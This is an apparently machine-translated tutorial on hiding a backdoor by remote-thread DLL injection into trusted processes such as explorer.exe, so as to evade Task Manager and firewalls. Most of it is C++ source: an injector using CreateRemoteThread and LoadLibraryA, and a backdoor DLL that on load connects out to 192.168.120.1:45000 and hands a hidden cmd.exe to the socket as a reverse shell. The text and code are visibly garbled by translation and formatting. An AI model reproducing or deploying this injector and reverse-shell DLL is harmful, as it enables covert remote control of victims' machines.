Safe way--using remote thread injection methods (using DLLs) to implement a wall-and-hide process

Brief introduction

Most backdoor or virus want to initially implement the hidden process , that is not the typical RING3-level process manager like Task Manager to find too obvious unknown process, the more famous method is to inject the malicious process through the method of the DLL file Inject system-approved normal processes, and you will find the Task Manager and cannot find a separate malicious process entry. reverse-connected backdoor with this technique, the process of injecting firewall approval (such as most system processes, like explorer.exe is common) also allows for a certain wall-piercing effect .

While process injection has been nearly 10 years old, many of the new hacking technologies that have emerged today are based on the evolution of this type of technology.

Examples of C + + code

1. Process Injection Tool source code:

filename:injectdll.cpp//creator:peterz1997//date:2018-5-15 23:58//Com Ment:dll inject module////////////////////////////////////////#pragma once#include <iostream> #include < cstdio> #include <cstdlib> #include <cstring> #include <strsafe.h> #include <windows.h># Include <tlhelp32.h>using namespace std; #define MAX_COUNT 255/** * @brief Increase process Permissions * @param name permission name */bool Enablede    Bugpriv (LPCSTR name) {HANDLE htoken;    LUID LUID;    Token_privileges TP; Open the process token if (! OpenProcessToken (GetCurrentProcess (), Token_query | Token_adjust_privileges, &htoken)) {printf ("[!]        Get Process Token error!\n ");    return false; }//Get permission Luid if (! Lookupprivilegevalue (NULL, Name, &luid)) {printf ("[!]        Get Privilege error!\n ");    return false; } TP.    Privilegecount = 1; Tp. Privileges[0].    Luid = Luid; Tp. Privileges[0].    Attributes = se_privilege_enabled; //Modify the process permissions if (! AdjustTokenPrivileges (Htoken, False, &AMP;TP, sizeof (token_privileges), NULL, NULL)) {printf ("[!]        Adjust Privilege error!\n ");    return false; } return true; /** * @brief Process injection function * @param pid Process ID * @param full path to dllfilename DLL file */bool injectdllproc (DWORD pid, LPCTST    R dllfilename) {HANDLE hremoteprocess;    CHAR *pszdllspace; if (!    Enabledebugpriv (Se_debug_name)) {return false; } if ((Hremoteprocess = OpenProcess (Process_all_access, FALSE, pid) = = NULL) {printf ("[!]        Open Target Process error!\n ");    return false; } if ((Pszdllspace = (char*) VirtualAllocEx (hremoteprocess, NULL, strlen (dllfilename) + 1, Mem_commit, page_readwrite)) = = NULL) {printf ("[!]        Alloc Space error!\n ");    return false;        } if (WriteProcessMemory (Hremoteprocess, Pszdllspace, (LPVOID) Dllfilename, strlen (dllfilename) + 1, NULL) = = 0) { printf ("[!]        Write to the Memory error!\n "); return False; } pthread_start_routine pfnstartaddr = (pthread_start_routine) GetProcAddress (GetModuleHandle ("Kernel32"), "    LoadLibraryA "); if (pfnstartaddr = = NULL) {printf ("[!]        Get <LoadLibrary> Function error!\n ");    return false;    } HANDLE Hremotethread = CreateRemoteThread (hremoteprocess, NULL, 0, pfnstartaddr, pszdllspace, 0, NULL); if (Hremotethread = = NULL) {printf ("[!]        Create Remote Thread error!\n ");    return false; } return true;    /** * @brief get Process ID * @param procname process name */dword getprocpid (LPCSTR procname) {DWORD pid = 0;    PROCESSENTRY32 pe32;    pe32.dwsize = sizeof (PE32);    HANDLE Hprocsnap = createtoolhelp32snapshot (th32cs_snapprocess, 0); if (Hprocsnap = = Invalid_handle_value) {printf ("[!]        Can not Create Process Snap!\n ");    return-1;    } BOOL Bproc = Process32First (Hprocsnap, &pe32); while (Bproc) {if (!stricmp (procname, Pe32.szexefile)) {return Pe32.th32proceSsID;    } Bproc = Process32Next (Hprocsnap, &pe32);    } closehandle (HPROCSNAP); return PID;}    /** * @brief main function */int main (int argc, char* argv[]) {char Dllpath[max_count] = "n";    Win32_find_data WFD;        if (argc! = 3) {printf ("[*usage*] injectDll.exe <process name> <dll name>\n");    return 0;    } getcurrentdirectory (sizeof (DllPath), dllpath);    StringCchCat (DllPath, sizeof (dllpath), "\ \");    StringCchCat (DllPath, sizeof (DllPath), argv[2]); if (FindFirstFile (argv[2], &wfd) = = Invalid_handle_value) {printf ("[!]        Can not Find Dll File!\n ");    return 0;    } DWORD pid = Getprocpid (Argv[1]); if (pid! =-1) {if (! Injectdllproc (PID, DllPath)) {printf ("[!]            Inject Dll error!\n ");        return 0;    } printf ("[*]inject Dll success!\n");        } else {printf ("[*]inject Dll error!\n");    return 0; } return 0;}

2.Dll File Sample source code:

filename:backdoordll.cpp//creator:peterz1997//date:2018-5-11 00:10//Comment: 0 pipe back door dll//////////////////////////////////////////////#pragma once#include <iostream># Include <cstdio> #include <cstdlib> #include <cstring> #include <strsafe.h> #include < winsock2.h> #include <windows.h> #pragma comment (lib, "ws2_32") using namespace std; #define MAX_COUNT 255/** * @    Brief starts the CMD process, communicates with the socket instance * @param the Lpparameter multithreaded function parameter, which is the incoming socket instance */dword WINAPI Startshellproc (lpvoid lpparameter) {    CHAR Cmdline[max_count] = "n";    Socket sserver = (socket) Lpparameter;    Startupinfo si;    Getstartupinfo (&AMP;SI); Si.dwflags = Startf_useshowwindow |    Startf_usestdhandles;    Si.wshowwindow = Sw_hide;    Si.hstdinput = Si.hstdoutput = Si.hstderror = (HANDLE) sserver;    GetSystemDirectory (cmdline, sizeof (cmdline));    StringCchCat (cmdline, sizeof (CmdLine), "\\cmd.exe");    Process_information Pi; CreateprOcess (NULL, cmdline, NULL, NULL, TRUE, 0, NULL, NULL, &AMP;SI, &AMP;PI);    WaitForSingleObject (pi.hprocess, INFINITE);    CloseHandle (pi.hprocess); return 0;} /** * @brief Socket Build function * @param lpparameter multithreaded function parameter, passed in null */dword WINAPI backdoorthread (lpvoid lpparameter) {CHA    R Szmessage[max_count] = "===========> hello,admin <=============\n";    Wsadata WSD;    SOCKET sserver;    Sockaddr_in sin;    if (WSAStartup (0x0202, &AMP;WSD)) return 0;    if (sserver = WSASocket (Af_inet, Sock_stream, ipproto_tcp, NULL, 0, 0)) = = Invalid_socket) {return 0;    } sin.sin_family = Af_inet;    Sin.sin_port = htons (45000); Sin.sin_addr. S_un.    S_ADDR = inet_addr ("192.168.120.1");    if (Connect (sserver, (sockaddr*) &sin, sizeof (sin)) = = Socket_error) {return 0;    } if (Send (Sserver, Szmessage, strlen (Szmessage), 0) = = socket_error) {return 0;    } HANDLE hthread = CreateThread (null, 0, Startshellproc, (LPVOID) sserver, 0, NULL); WaitforsiNgleobject (Hthread, INFINITE); return 0;} /** * @brief DLL file main function */bool WINAPI DllMain (_in_ hinstance hinstDLL, _in_ DWORD fdwreason, _in_ lpvoid LP vreserved) {switch (Fdwreason) {case dll_process_attach:createthread (null, 0, backdoorthread, NULL, 0, N        ULL);    Break    Case Dll_thread_attach:break;    Case Dll_thread_detach:break;    Case Dll_process_detach:break; } return true;

Secure Path-use remote thread injection methods (using DLLs) to implement a wall-through and hidden process